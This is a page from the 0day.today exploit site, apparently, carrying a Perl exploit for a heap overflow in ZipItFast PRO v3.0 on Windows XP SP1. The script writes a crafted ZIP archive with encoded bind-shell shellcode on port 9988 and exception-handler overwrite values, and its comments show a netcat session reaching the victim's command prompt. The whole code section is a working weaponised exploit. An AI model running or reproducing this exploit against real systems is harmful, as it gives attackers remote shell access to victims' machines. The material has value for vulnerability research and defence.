0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ZipItFast PRO v3.0 Heap Overflow Exploit
[#!/usr/bin/perl #---------------------------------------------------------------------------# # Exploit: ZipItFast PRO v3.0 Heap-Overflow # # Author: b33f - http://www.fuzzysecurity.com/ # # OS: Windows XP SP1 # # DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/ # # Software: http://www.exploit-db.com/wp-content/themes/exploit/ # # applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # #---------------------------------------------------------------------------# # Sorry for reinventing the wheel but learning about heap-overflows # # requires you to take a step back and roll with the punches not unlike # # watching a David Lynch production ;))... # # # # - "Who is that lady with the log?" # # + "We call her the log-lady.." # #---------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.131 9988 # # (UNKNOWN) [192.168.111.131] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Documents and Settings\Owner\Desktop> # #---------------------------------------------------------------------------# use strict; use warnings; my $filename = "Exploit.zip"; my $head = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00"; my $head2 = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00"; my $head3 = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00"; # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t # [*] x86/alpha_mixed succeeded with size 744 (iteration=1) my $ph33r = "\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" . "\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" . "\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" . "\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" . "\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" . "\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" . "\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" . "\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" . "\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" . "\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" . "\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" . "\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" . "\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" . "\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" . "\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" . "\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" . "\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" . "\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" . "\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" . "\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" . "\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" . "\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" . "\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" . "\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" . "\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" . "\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" . "\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" . "\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" . "\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" . "\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" . "\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" . "\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" . "\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" . "\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" . "\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" . "\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" . "\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" . "\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" . "\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" . "\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" . "\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" . "\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" . "\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" . "\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" . "\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" . "\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" . "\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" . "\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" . "\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" . "\x41\x41"; my $buf1 = "A" x 4064 . ".txt"; ################# # EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE) # EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode) # Jump over Blink and Flink => EB 0A ################# my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00"; ################## # Notice that the offsets don't correspond exactly. I experienced some buffer # expansion and compression depending on the buffer structure so keep that in # mind if you want to do some testing. # # Remember to set Anti-Debugging flags in your debugger.. # (immunity = > !hidedebug All_Debug) ################## my $buf2 = "\x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt"; my $zip = $head.$buf1.$head2.$buf2.$head3; open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE); # 0day.today [2024-11-14] #